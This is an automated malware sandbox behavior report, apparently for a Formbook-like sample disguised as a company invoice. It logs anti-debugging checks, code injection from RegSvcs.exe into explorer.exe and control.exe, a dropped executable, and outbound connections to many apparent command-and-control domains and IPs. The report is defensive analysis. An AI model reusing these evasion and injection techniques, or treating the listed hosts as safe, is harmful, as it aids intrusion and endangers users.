Source: C:\Windows\SysWOW64\control.exe	Code function: 11_2_04F21C06 mov eax, dword ptr fs:[00000030h]	11_2_04F21C06
Source: C:\Windows\SysWOW64\control.exe	Code function: 11_2_04F21C06 mov eax, dword ptr fs:[00000030h]	11_2_04F21C06
Source: C:\Windows\SysWOW64\control.exe	Code function: 11_2_04F21C06 mov eax, dword ptr fs:[00000030h]	11_2_04F21C06
Source: C:\Windows\SysWOW64\control.exe	Code function: 11_2_04F21C06 mov eax, dword ptr fs:[00000030h]	11_2_04F21C06
Source: C:\Windows\SysWOW64\control.exe	Code function: 11_2_04F21C06 mov eax, dword ptr fs:[00000030h]	11_2_04F21C06
Source: C:\Windows\SysWOW64\control.exe	Code function: 11_2_04F21C06 mov eax, dword ptr fs:[00000030h]	11_2_04F21C06
Source: C:\Windows\SysWOW64\control.exe	Code function: 11_2_04F21C06 mov eax, dword ptr fs:[00000030h]	11_2_04F21C06
Source: C:\Windows\SysWOW64\control.exe	Code function: 11_2_04F21C06 mov eax, dword ptr fs:[00000030h]	11_2_04F21C06
Source: C:\Windows\SysWOW64\control.exe	Code function: 11_2_04F21C06 mov eax, dword ptr fs:[00000030h]	11_2_04F21C06
Source: C:\Windows\SysWOW64\control.exe	Code function: 11_2_04F21C06 mov eax, dword ptr fs:[00000030h]	11_2_04F21C06
Source: C:\Windows\SysWOW64\control.exe	Code function: 11_2_04F21C06 mov eax, dword ptr fs:[00000030h]	11_2_04F21C06
Source: C:\Windows\SysWOW64\control.exe	Code function: 11_2_04F21C06 mov eax, dword ptr fs:[00000030h]	11_2_04F21C06
Source: C:\Windows\SysWOW64\control.exe	Code function: 11_2_04F21C06 mov eax, dword ptr fs:[00000030h]	11_2_04F21C06
Source: C:\Windows\SysWOW64\control.exe	Code function: 11_2_04F21C06 mov eax, dword ptr fs:[00000030h]	11_2_04F21C06
Source: C:\Windows\SysWOW64\control.exe	Code function: 11_2_04EE7016 mov eax, dword ptr fs:[00000030h]	11_2_04EE7016
Source: C:\Windows\SysWOW64\control.exe	Code function: 11_2_04EE7016 mov eax, dword ptr fs:[00000030h]	11_2_04EE7016
Source: C:\Windows\SysWOW64\control.exe	Code function: 11_2_04EE7016 mov eax, dword ptr fs:[00000030h]	11_2_04EE7016
Source: C:\Windows\SysWOW64\control.exe	Code function: 11_2_04F3740D mov eax, dword ptr fs:[00000030h]	11_2_04F3740D
Source: C:\Windows\SysWOW64\control.exe	Code function: 11_2_04F3740D mov eax, dword ptr fs:[00000030h]	11_2_04F3740D
Source: C:\Windows\SysWOW64\control.exe	Code function: 11_2_04F3740D mov eax, dword ptr fs:[00000030h]	11_2_04F3740D
Source: C:\Windows\SysWOW64\control.exe	Code function: 11_2_04F18DF1 mov eax, dword ptr fs:[00000030h]	11_2_04F18DF1
Source: C:\Windows\SysWOW64\control.exe	Code function: 11_2_04E6B1E1 mov eax, dword ptr fs:[00000030h]	11_2_04E6B1E1
Source: C:\Windows\SysWOW64\control.exe	Code function: 11_2_04E6B1E1 mov eax, dword ptr fs:[00000030h]	11_2_04E6B1E1
Source: C:\Windows\SysWOW64\control.exe	Code function: 11_2_04E6B1E1 mov eax, dword ptr fs:[00000030h]	11_2_04E6B1E1
Source: C:\Windows\SysWOW64\control.exe	Code function: 11_2_04EF41E8 mov eax, dword ptr fs:[00000030h]	11_2_04EF41E8
Source: C:\Windows\SysWOW64\control.exe	Code function: 11_2_04E7D5E0 mov eax, dword ptr fs:[00000030h]	11_2_04E7D5E0
Source: C:\Windows\SysWOW64\control.exe	Code function: 11_2_04E7D5E0 mov eax, dword ptr fs:[00000030h]	11_2_04E7D5E0
Source: C:\Windows\SysWOW64\control.exe	Code function: 11_2_04EE6DC9 mov eax, dword ptr fs:[00000030h]	11_2_04EE6DC9
Source: C:\Windows\SysWOW64\control.exe	Code function: 11_2_04EE6DC9 mov eax, dword ptr fs:[00000030h]	11_2_04EE6DC9
Source: C:\Windows\SysWOW64\control.exe	Code function: 11_2_04EE6DC9 mov eax, dword ptr fs:[00000030h]	11_2_04EE6DC9
Source: C:\Windows\SysWOW64\control.exe	Code function: 11_2_04EE6DC9 mov ecx, dword ptr fs:[00000030h]	11_2_04EE6DC9
Source: C:\Windows\SysWOW64\control.exe	Code function: 11_2_04EE6DC9 mov eax, dword ptr fs:[00000030h]	11_2_04EE6DC9
Source: C:\Windows\SysWOW64\control.exe	Code function: 11_2_04EE6DC9 mov eax, dword ptr fs:[00000030h]	11_2_04EE6DC9
Source: C:\Windows\SysWOW64\control.exe	Code function: 11_2_04E935A1 mov eax, dword ptr fs:[00000030h]	11_2_04E935A1
Source: C:\Windows\SysWOW64\control.exe	Code function: 11_2_04EE69A6 mov eax, dword ptr fs:[00000030h]	11_2_04EE69A6
Source: C:\Windows\SysWOW64\control.exe	Code function: 11_2_04E961A0 mov eax, dword ptr fs:[00000030h]	11_2_04E961A0
Source: C:\Windows\SysWOW64\control.exe	Code function: 11_2_04E961A0 mov eax, dword ptr fs:[00000030h]	11_2_04E961A0
Source: C:\Windows\SysWOW64\control.exe	Code function: 11_2_04EE51BE mov eax, dword ptr fs:[00000030h]	11_2_04EE51BE
Source: C:\Windows\SysWOW64\control.exe	Code function: 11_2_04EE51BE mov eax, dword ptr fs:[00000030h]	11_2_04EE51BE
Source: C:\Windows\SysWOW64\control.exe	Code function: 11_2_04EE51BE mov eax, dword ptr fs:[00000030h]	11_2_04EE51BE
Source: C:\Windows\SysWOW64\control.exe	Code function: 11_2_04EE51BE mov eax, dword ptr fs:[00000030h]	11_2_04EE51BE
Source: C:\Windows\SysWOW64\control.exe	Code function: 11_2_04E91DB5 mov eax, dword ptr fs:[00000030h]	11_2_04E91DB5
Source: C:\Windows\SysWOW64\control.exe	Code function: 11_2_04E91DB5 mov eax, dword ptr fs:[00000030h]	11_2_04E91DB5
Source: C:\Windows\SysWOW64\control.exe	Code function: 11_2_04E91DB5 mov eax, dword ptr fs:[00000030h]	11_2_04E91DB5
Source: C:\Windows\SysWOW64\control.exe	Code function: 11_2_04F305AC mov eax, dword ptr fs:[00000030h]	11_2_04F305AC
Source: C:\Windows\SysWOW64\control.exe	Code function: 11_2_04F305AC mov eax, dword ptr fs:[00000030h]	11_2_04F305AC
Source: C:\Windows\SysWOW64\control.exe	Code function: 11_2_04E92581 mov eax, dword ptr fs:[00000030h]	11_2_04E92581
Source: C:\Windows\SysWOW64\control.exe	Code function: 11_2_04E92581 mov eax, dword ptr fs:[00000030h]	11_2_04E92581
Source: C:\Windows\SysWOW64\control.exe	Code function: 11_2_04E92581 mov eax, dword ptr fs:[00000030h]	11_2_04E92581
Source: C:\Windows\SysWOW64\control.exe	Code function: 11_2_04E92581 mov eax, dword ptr fs:[00000030h]	11_2_04E92581
Source: C:\Windows\SysWOW64\control.exe	Code function: 11_2_04E8C182 mov eax, dword ptr fs:[00000030h]	11_2_04E8C182
Source: C:\Windows\SysWOW64\control.exe	Code function: 11_2_04E9A185 mov eax, dword ptr fs:[00000030h]	11_2_04E9A185
Source: C:\Windows\SysWOW64\control.exe	Code function: 11_2_04E62D8A mov eax, dword ptr fs:[00000030h]	11_2_04E62D8A
Source: C:\Windows\SysWOW64\control.exe	Code function: 11_2_04E62D8A mov eax, dword ptr fs:[00000030h]	11_2_04E62D8A
Source: C:\Windows\SysWOW64\control.exe	Code function: 11_2_04E62D8A mov eax, dword ptr fs:[00000030h]	11_2_04E62D8A
Source: C:\Windows\SysWOW64\control.exe	Code function: 11_2_04E62D8A mov eax, dword ptr fs:[00000030h]	11_2_04E62D8A
Source: C:\Windows\SysWOW64\control.exe	Code function: 11_2_04E62D8A mov eax, dword ptr fs:[00000030h]	11_2_04E62D8A
Source: C:\Windows\SysWOW64\control.exe	Code function: 11_2_04E9FD9B mov eax, dword ptr fs:[00000030h]	11_2_04E9FD9B
Source: C:\Windows\SysWOW64\control.exe	Code function: 11_2_04E9FD9B mov eax, dword ptr fs:[00000030h]	11_2_04E9FD9B
Source: C:\Windows\SysWOW64\control.exe	Code function: 11_2_04E92990 mov eax, dword ptr fs:[00000030h]	11_2_04E92990
Source: C:\Windows\SysWOW64\control.exe	Code function: 11_2_04E6C962 mov eax, dword ptr fs:[00000030h]	11_2_04E6C962
Source: C:\Windows\SysWOW64\control.exe	Code function: 11_2_04E6B171 mov eax, dword ptr fs:[00000030h]	11_2_04E6B171
Source: C:\Windows\SysWOW64\control.exe	Code function: 11_2_04E6B171 mov eax, dword ptr fs:[00000030h]	11_2_04E6B171
Source: C:\Windows\SysWOW64\control.exe	Code function: 11_2_04E8C577 mov eax, dword ptr fs:[00000030h]	11_2_04E8C577
Source: C:\Windows\SysWOW64\control.exe	Code function: 11_2_04E8C577 mov eax, dword ptr fs:[00000030h]	11_2_04E8C577
Source: C:\Windows\SysWOW64\control.exe	Code function: 11_2_04EA3D43 mov eax, dword ptr fs:[00000030h]	11_2_04EA3D43
Source: C:\Windows\SysWOW64\control.exe	Code function: 11_2_04E8B944 mov eax, dword ptr fs:[00000030h]	11_2_04E8B944
Source: C:\Windows\SysWOW64\control.exe	Code function: 11_2_04E8B944 mov eax, dword ptr fs:[00000030h]	11_2_04E8B944
Source: C:\Windows\SysWOW64\control.exe	Code function: 11_2_04EE3540 mov eax, dword ptr fs:[00000030h]	11_2_04EE3540
Source: C:\Windows\SysWOW64\control.exe	Code function: 11_2_04E87D50 mov eax, dword ptr fs:[00000030h]	11_2_04E87D50
Source: C:\Windows\SysWOW64\control.exe	Code function: 11_2_04F38D34 mov eax, dword ptr fs:[00000030h]	11_2_04F38D34
Source: C:\Windows\SysWOW64\control.exe	Code function: 11_2_04E84120 mov eax, dword ptr fs:[00000030h]	11_2_04E84120
Source: C:\Windows\SysWOW64\control.exe	Code function: 11_2_04E84120 mov eax, dword ptr fs:[00000030h]	11_2_04E84120
Source: C:\Windows\SysWOW64\control.exe	Code function: 11_2_04E84120 mov eax, dword ptr fs:[00000030h]	11_2_04E84120
Source: C:\Windows\SysWOW64\control.exe	Code function: 11_2_04E84120 mov eax, dword ptr fs:[00000030h]	11_2_04E84120
Source: C:\Windows\SysWOW64\control.exe	Code function: 11_2_04E84120 mov ecx, dword ptr fs:[00000030h]	11_2_04E84120
Source: C:\Windows\SysWOW64\control.exe	Code function: 11_2_04E94D3B mov eax, dword ptr fs:[00000030h]	11_2_04E94D3B
Source: C:\Windows\SysWOW64\control.exe	Code function: 11_2_04E94D3B mov eax, dword ptr fs:[00000030h]	11_2_04E94D3B
Source: C:\Windows\SysWOW64\control.exe	Code function: 11_2_04E94D3B mov eax, dword ptr fs:[00000030h]	11_2_04E94D3B
Source: C:\Windows\SysWOW64\control.exe	Code function: 11_2_04E9513A mov eax, dword ptr fs:[00000030h]	11_2_04E9513A
Source: C:\Windows\SysWOW64\control.exe	Code function: 11_2_04E9513A mov eax, dword ptr fs:[00000030h]	11_2_04E9513A
Source: C:\Windows\SysWOW64\control.exe	Code function: 11_2_04E73D34 mov eax, dword ptr fs:[00000030h]	11_2_04E73D34
Source: C:\Windows\SysWOW64\control.exe	Code function: 11_2_04E73D34 mov eax, dword ptr fs:[00000030h]	11_2_04E73D34
Source: C:\Windows\SysWOW64\control.exe	Code function: 11_2_04E73D34 mov eax, dword ptr fs:[00000030h]	11_2_04E73D34
Source: C:\Windows\SysWOW64\control.exe	Code function: 11_2_04E73D34 mov eax, dword ptr fs:[00000030h]	11_2_04E73D34
Source: C:\Windows\SysWOW64\control.exe	Code function: 11_2_04E73D34 mov eax, dword ptr fs:[00000030h]	11_2_04E73D34
Source: C:\Windows\SysWOW64\control.exe	Code function: 11_2_04E73D34 mov eax, dword ptr fs:[00000030h]	11_2_04E73D34
Source: C:\Windows\SysWOW64\control.exe	Code function: 11_2_04E73D34 mov eax, dword ptr fs:[00000030h]	11_2_04E73D34
Source: C:\Windows\SysWOW64\control.exe	Code function: 11_2_04E73D34 mov eax, dword ptr fs:[00000030h]	11_2_04E73D34
Source: C:\Windows\SysWOW64\control.exe	Code function: 11_2_04E73D34 mov eax, dword ptr fs:[00000030h]	11_2_04E73D34
Source: C:\Windows\SysWOW64\control.exe	Code function: 11_2_04E73D34 mov eax, dword ptr fs:[00000030h]	11_2_04E73D34
Source: C:\Windows\SysWOW64\control.exe	Code function: 11_2_04E73D34 mov eax, dword ptr fs:[00000030h]	11_2_04E73D34
Source: C:\Windows\SysWOW64\control.exe	Code function: 11_2_04E73D34 mov eax, dword ptr fs:[00000030h]	11_2_04E73D34
Source: C:\Windows\SysWOW64\control.exe	Code function: 11_2_04E73D34 mov eax, dword ptr fs:[00000030h]	11_2_04E73D34
Source: C:\Windows\SysWOW64\control.exe	Code function: 11_2_04E6AD30 mov eax, dword ptr fs:[00000030h]	11_2_04E6AD30
Source: C:\Windows\SysWOW64\control.exe	Code function: 11_2_04EEA537 mov eax, dword ptr fs:[00000030h]	11_2_04EEA537
Source: C:\Windows\SysWOW64\control.exe	Code function: 11_2_04E69100 mov eax, dword ptr fs:[00000030h]	11_2_04E69100
Source: C:\Windows\SysWOW64\control.exe	Code function: 11_2_04E69100 mov eax, dword ptr fs:[00000030h]	11_2_04E69100
Source: C:\Windows\SysWOW64\control.exe	Code function: 11_2_04E69100 mov eax, dword ptr fs:[00000030h]	11_2_04E69100
Source: C:\Windows\SysWOW64\control.exe	Code function: 11_2_04E776E2 mov eax, dword ptr fs:[00000030h]	11_2_04E776E2
Source: C:\Windows\SysWOW64\control.exe	Code function: 11_2_04E916E0 mov ecx, dword ptr fs:[00000030h]	11_2_04E916E0
Source: C:\Windows\SysWOW64\control.exe	Code function: 11_2_04E92AE4 mov eax, dword ptr fs:[00000030h]	11_2_04E92AE4
Source: C:\Windows\SysWOW64\control.exe	Code function: 11_2_04E92ACB mov eax, dword ptr fs:[00000030h]	11_2_04E92ACB
Source: C:\Windows\SysWOW64\control.exe	Code function: 11_2_04F38ED6 mov eax, dword ptr fs:[00000030h]	11_2_04F38ED6
Source: C:\Windows\SysWOW64\control.exe	Code function: 11_2_04E936CC mov eax, dword ptr fs:[00000030h]	11_2_04E936CC
Source: C:\Windows\SysWOW64\control.exe	Code function: 11_2_04EA8EC7 mov eax, dword ptr fs:[00000030h]	11_2_04EA8EC7
Source: C:\Windows\SysWOW64\control.exe	Code function: 11_2_04F1FEC0 mov eax, dword ptr fs:[00000030h]	11_2_04F1FEC0
Source: C:\Windows\SysWOW64\control.exe	Code function: 11_2_04E652A5 mov eax, dword ptr fs:[00000030h]	11_2_04E652A5
Source: C:\Windows\SysWOW64\control.exe	Code function: 11_2_04E652A5 mov eax, dword ptr fs:[00000030h]	11_2_04E652A5
Source: C:\Windows\SysWOW64\control.exe	Code function: 11_2_04E652A5 mov eax, dword ptr fs:[00000030h]	11_2_04E652A5
Source: C:\Windows\SysWOW64\control.exe	Code function: 11_2_04E652A5 mov eax, dword ptr fs:[00000030h]	11_2_04E652A5
Source: C:\Windows\SysWOW64\control.exe	Code function: 11_2_04E652A5 mov eax, dword ptr fs:[00000030h]	11_2_04E652A5
Source: C:\Windows\SysWOW64\control.exe	Code function: 11_2_04EE46A7 mov eax, dword ptr fs:[00000030h]	11_2_04EE46A7
Source: C:\Windows\SysWOW64\control.exe	Code function: 11_2_04F30EA5 mov eax, dword ptr fs:[00000030h]	11_2_04F30EA5
Source: C:\Windows\SysWOW64\control.exe	Code function: 11_2_04F30EA5 mov eax, dword ptr fs:[00000030h]	11_2_04F30EA5
Source: C:\Windows\SysWOW64\control.exe	Code function: 11_2_04F30EA5 mov eax, dword ptr fs:[00000030h]	11_2_04F30EA5
Source: C:\Windows\SysWOW64\control.exe	Code function: 11_2_04E7AAB0 mov eax, dword ptr fs:[00000030h]	11_2_04E7AAB0
Source: C:\Windows\SysWOW64\control.exe	Code function: 11_2_04E7AAB0 mov eax, dword ptr fs:[00000030h]	11_2_04E7AAB0
Source: C:\Windows\SysWOW64\control.exe	Code function: 11_2_04E9FAB0 mov eax, dword ptr fs:[00000030h]	11_2_04E9FAB0
Source: C:\Windows\SysWOW64\control.exe	Code function: 11_2_04EFFE87 mov eax, dword ptr fs:[00000030h]	11_2_04EFFE87
Source: C:\Windows\SysWOW64\control.exe	Code function: 11_2_04E9D294 mov eax, dword ptr fs:[00000030h]	11_2_04E9D294
Source: C:\Windows\SysWOW64\control.exe	Code function: 11_2_04E9D294 mov eax, dword ptr fs:[00000030h]	11_2_04E9D294
Source: C:\Windows\SysWOW64\control.exe	Code function: 11_2_04E7766D mov eax, dword ptr fs:[00000030h]	11_2_04E7766D
Source: C:\Windows\SysWOW64\control.exe	Code function: 11_2_04EA927A mov eax, dword ptr fs:[00000030h]	11_2_04EA927A
Source: C:\Windows\SysWOW64\control.exe	Code function: 11_2_04F1B260 mov eax, dword ptr fs:[00000030h]	11_2_04F1B260
Source: C:\Windows\SysWOW64\control.exe	Code function: 11_2_04F1B260 mov eax, dword ptr fs:[00000030h]	11_2_04F1B260
Source: C:\Windows\SysWOW64\control.exe	Code function: 11_2_04F38A62 mov eax, dword ptr fs:[00000030h]	11_2_04F38A62
Source: C:\Windows\SysWOW64\control.exe	Code function: 11_2_04E8AE73 mov eax, dword ptr fs:[00000030h]	11_2_04E8AE73
Source: C:\Windows\SysWOW64\control.exe	Code function: 11_2_04E8AE73 mov eax, dword ptr fs:[00000030h]	11_2_04E8AE73
Source: C:\Windows\SysWOW64\control.exe	Code function: 11_2_04E8AE73 mov eax, dword ptr fs:[00000030h]	11_2_04E8AE73
Source: C:\Windows\SysWOW64\control.exe	Code function: 11_2_04E8AE73 mov eax, dword ptr fs:[00000030h]	11_2_04E8AE73
Source: C:\Windows\SysWOW64\control.exe	Code function: 11_2_04E8AE73 mov eax, dword ptr fs:[00000030h]	11_2_04E8AE73
Source: C:\Windows\SysWOW64\control.exe	Code function: 11_2_04E69240 mov eax, dword ptr fs:[00000030h]	11_2_04E69240
Source: C:\Windows\SysWOW64\control.exe	Code function: 11_2_04E69240 mov eax, dword ptr fs:[00000030h]	11_2_04E69240
Source: C:\Windows\SysWOW64\control.exe	Code function: 11_2_04E69240 mov eax, dword ptr fs:[00000030h]	11_2_04E69240
Source: C:\Windows\SysWOW64\control.exe	Code function: 11_2_04E69240 mov eax, dword ptr fs:[00000030h]	11_2_04E69240
Source: C:\Windows\SysWOW64\control.exe	Code function: 11_2_04E77E41 mov eax, dword ptr fs:[00000030h]	11_2_04E77E41
Source: C:\Windows\SysWOW64\control.exe	Code function: 11_2_04E77E41 mov eax, dword ptr fs:[00000030h]	11_2_04E77E41
Source: C:\Windows\SysWOW64\control.exe	Code function: 11_2_04E77E41 mov eax, dword ptr fs:[00000030h]	11_2_04E77E41
Source: C:\Windows\SysWOW64\control.exe	Code function: 11_2_04E77E41 mov eax, dword ptr fs:[00000030h]	11_2_04E77E41
Source: C:\Windows\SysWOW64\control.exe	Code function: 11_2_04E77E41 mov eax, dword ptr fs:[00000030h]	11_2_04E77E41
Source: C:\Windows\SysWOW64\control.exe	Code function: 11_2_04E77E41 mov eax, dword ptr fs:[00000030h]	11_2_04E77E41
Source: C:\Windows\SysWOW64\control.exe	Code function: 11_2_04EF4257 mov eax, dword ptr fs:[00000030h]	11_2_04EF4257
Source: C:\Windows\SysWOW64\control.exe	Code function: 11_2_04E6E620 mov eax, dword ptr fs:[00000030h]	11_2_04E6E620
Source: C:\Windows\SysWOW64\control.exe	Code function: 11_2_04EA4A2C mov eax, dword ptr fs:[00000030h]	11_2_04EA4A2C
Source: C:\Windows\SysWOW64\control.exe	Code function: 11_2_04EA4A2C mov eax, dword ptr fs:[00000030h]	11_2_04EA4A2C
Source: C:\Windows\SysWOW64\control.exe	Code function: 11_2_04F1FE3F mov eax, dword ptr fs:[00000030h]	11_2_04F1FE3F
Source: C:\Windows\SysWOW64\control.exe	Code function: 11_2_04E6C600 mov eax, dword ptr fs:[00000030h]	11_2_04E6C600
Source: C:\Windows\SysWOW64\control.exe	Code function: 11_2_04E6C600 mov eax, dword ptr fs:[00000030h]	11_2_04E6C600
Source: C:\Windows\SysWOW64\control.exe	Code function: 11_2_04E6C600 mov eax, dword ptr fs:[00000030h]	11_2_04E6C600
Source: C:\Windows\SysWOW64\control.exe	Code function: 11_2_04E98E00 mov eax, dword ptr fs:[00000030h]	11_2_04E98E00
Source: C:\Windows\SysWOW64\control.exe	Code function: 11_2_04E78A0A mov eax, dword ptr fs:[00000030h]	11_2_04E78A0A
Source: C:\Windows\SysWOW64\control.exe	Code function: 11_2_04E6AA16 mov eax, dword ptr fs:[00000030h]	11_2_04E6AA16
Source: C:\Windows\SysWOW64\control.exe	Code function: 11_2_04E6AA16 mov eax, dword ptr fs:[00000030h]	11_2_04E6AA16
Source: C:\Windows\SysWOW64\control.exe	Code function: 11_2_04E83A1C mov eax, dword ptr fs:[00000030h]	11_2_04E83A1C
Source: C:\Windows\SysWOW64\control.exe	Code function: 11_2_04E9A61C mov eax, dword ptr fs:[00000030h]	11_2_04E9A61C
Source: C:\Windows\SysWOW64\control.exe	Code function: 11_2_04E9A61C mov eax, dword ptr fs:[00000030h]	11_2_04E9A61C
Source: C:\Windows\SysWOW64\control.exe	Code function: 11_2_04E65210 mov eax, dword ptr fs:[00000030h]	11_2_04E65210
Source: C:\Windows\SysWOW64\control.exe	Code function: 11_2_04E65210 mov ecx, dword ptr fs:[00000030h]	11_2_04E65210
Source: C:\Windows\SysWOW64\control.exe	Code function: 11_2_04E65210 mov eax, dword ptr fs:[00000030h]	11_2_04E65210
Source: C:\Windows\SysWOW64\control.exe	Code function: 11_2_04E65210 mov eax, dword ptr fs:[00000030h]	11_2_04E65210
Source: C:\Windows\SysWOW64\control.exe	Code function: 11_2_04F21608 mov eax, dword ptr fs:[00000030h]	11_2_04F21608
Source: C:\Windows\SysWOW64\control.exe	Code function: 11_2_04E8DBE9 mov eax, dword ptr fs:[00000030h]	11_2_04E8DBE9
Source: C:\Windows\SysWOW64\control.exe	Code function: 11_2_04E903E2 mov eax, dword ptr fs:[00000030h]	11_2_04E903E2
Source: C:\Windows\SysWOW64\control.exe	Code function: 11_2_04E903E2 mov eax, dword ptr fs:[00000030h]	11_2_04E903E2
Source: C:\Windows\SysWOW64\control.exe	Code function: 11_2_04E903E2 mov eax, dword ptr fs:[00000030h]	11_2_04E903E2
Source: C:\Windows\SysWOW64\control.exe	Code function: 11_2_04E903E2 mov eax, dword ptr fs:[00000030h]	11_2_04E903E2
Source: C:\Windows\SysWOW64\control.exe	Code function: 11_2_04E903E2 mov eax, dword ptr fs:[00000030h]	11_2_04E903E2
Source: C:\Windows\SysWOW64\control.exe	Code function: 11_2_04E903E2 mov eax, dword ptr fs:[00000030h]	11_2_04E903E2
Source: C:\Windows\SysWOW64\control.exe	Code function: 11_2_04EA37F5 mov eax, dword ptr fs:[00000030h]	11_2_04EA37F5
Source: C:\Windows\SysWOW64\control.exe	Code function: 11_2_04EE53CA mov eax, dword ptr fs:[00000030h]	11_2_04EE53CA
Source: C:\Windows\SysWOW64\control.exe	Code function: 11_2_04EE53CA mov eax, dword ptr fs:[00000030h]	11_2_04EE53CA
Source: C:\Windows\SysWOW64\control.exe	Code function: 11_2_04E94BAD mov eax, dword ptr fs:[00000030h]	11_2_04E94BAD
Source: C:\Windows\SysWOW64\control.exe	Code function: 11_2_04E94BAD mov eax, dword ptr fs:[00000030h]	11_2_04E94BAD
Source: C:\Windows\SysWOW64\control.exe	Code function: 11_2_04E94BAD mov eax, dword ptr fs:[00000030h]	11_2_04E94BAD
Source: C:\Windows\SysWOW64\control.exe	Code function: 11_2_04F35BA5 mov eax, dword ptr fs:[00000030h]	11_2_04F35BA5
Source: C:\Windows\SysWOW64\control.exe	Code function: 11_2_04E71B8F mov eax, dword ptr fs:[00000030h]	11_2_04E71B8F
Source: C:\Windows\SysWOW64\control.exe	Code function: 11_2_04E71B8F mov eax, dword ptr fs:[00000030h]	11_2_04E71B8F
Source: C:\Windows\SysWOW64\control.exe	Code function: 11_2_04F1D380 mov ecx, dword ptr fs:[00000030h]	11_2_04F1D380
Source: C:\Windows\SysWOW64\control.exe	Code function: 11_2_04E78794 mov eax, dword ptr fs:[00000030h]	11_2_04E78794
Source: C:\Windows\SysWOW64\control.exe	Code function: 11_2_04F2138A mov eax, dword ptr fs:[00000030h]	11_2_04F2138A
Source: C:\Windows\SysWOW64\control.exe	Code function: 11_2_04E9B390 mov eax, dword ptr fs:[00000030h]	11_2_04E9B390
Source: C:\Windows\SysWOW64\control.exe	Code function: 11_2_04EE7794 mov eax, dword ptr fs:[00000030h]	11_2_04EE7794
Source: C:\Windows\SysWOW64\control.exe	Code function: 11_2_04EE7794 mov eax, dword ptr fs:[00000030h]	11_2_04EE7794

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\SysWOW64\control.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Code function: 5_2_004088D0 rdtsc

5_2_004088D0

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Code function: 5_2_00409B40 LdrLoadDll,

5_2_00409B40

Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\image.exe

Memory allocated: page read and write | page guard

Jump to behavior

Source: C:\Users\user\Desktop\08.02.2022_Prox0030_0122- TAIWAN HOKURYO CO.,LTD.exe	Code function: 0_2_00007FF6EB148790 SetUnhandledExceptionFilter,		0_2_00007FF6EB148790
Source: C:\Users\user\Desktop\08.02.2022_Prox0030_0122- TAIWAN HOKURYO CO.,LTD.exe	Code function: 0_2_00007FF6EB148494 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,		0_2_00007FF6EB148494

HIPS / PFW / Operating System Protection Evasion

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\explorer.exe	Network Connect: 213.186.33.5 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.marketplaceimmo.com
Source: C:\Windows\explorer.exe	Network Connect: 162.0.233.84 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.okargo.pro
Source: C:\Windows\explorer.exe	Network Connect: 18.194.171.90 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.wxiw.xyz
Source: C:\Windows\explorer.exe	Domain query: www.real-market-34.xyz
Source: C:\Windows\explorer.exe	Network Connect: 217.160.0.132 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 66.96.160.139 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 185.215.4.12 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.cosmosmeta.com
Source: C:\Windows\explorer.exe	Domain query: www.oooci.com
Source: C:\Windows\explorer.exe	Network Connect: 52.20.84.62 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.unitedtrials.net
Source: C:\Windows\explorer.exe	Domain query: www.perfectselfstorageaston.com
Source: C:\Windows\explorer.exe	Domain query: www.fhpuyfpe.com
Source: C:\Windows\explorer.exe	Domain query: www.gestaltants.com
Source: C:\Windows\explorer.exe	Network Connect: 106.186.69.5 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.computershit.net
Source: C:\Windows\explorer.exe	Domain query: www.fraiuhs.com
Source: C:\Windows\explorer.exe	Domain query: www.marsmoose.com
Source: C:\Windows\explorer.exe	Network Connect: 134.122.133.172 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.tutorgpa.com
Source: C:\Windows\explorer.exe	Network Connect: 74.208.236.190 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.yokoi-tatami-lab.com
Source: C:\Windows\explorer.exe	Network Connect: 101.35.123.80 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.strickercosolutions.com
Source: C:\Windows\explorer.exe	Domain query: www.us-paypal.online
Source: C:\Windows\explorer.exe	Network Connect: 34.102.136.180 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.libertymarket.net
Source: C:\Windows\explorer.exe	Domain query: www.getbraintruth.com
Source: C:\Windows\explorer.exe	Network Connect: 104.21.36.34 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.punksparrow.com
Source: C:\Windows\explorer.exe	Domain query: www.boninvahas.club
Source: C:\Windows\explorer.exe	Domain query: www.drinco.club
Source: C:\Windows\explorer.exe	Domain query: www.flat-planet.com

Benign windows process drops PE files

Source: C:\Windows\explorer.exe

File created: d6wtv4o01bbhxt.exe.6.dr

Jump to dropped file

Maps a DLL or memory area into another process

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Section loaded: unknown target: C:\Windows\SysWOW64\control.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Section loaded: unknown target: C:\Windows\SysWOW64\control.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\control.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\control.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior

Allocates memory in foreign processes

Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\image.exe

Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 protect: page execute and read and write

Jump to behavior

Injects a PE file into a foreign processes

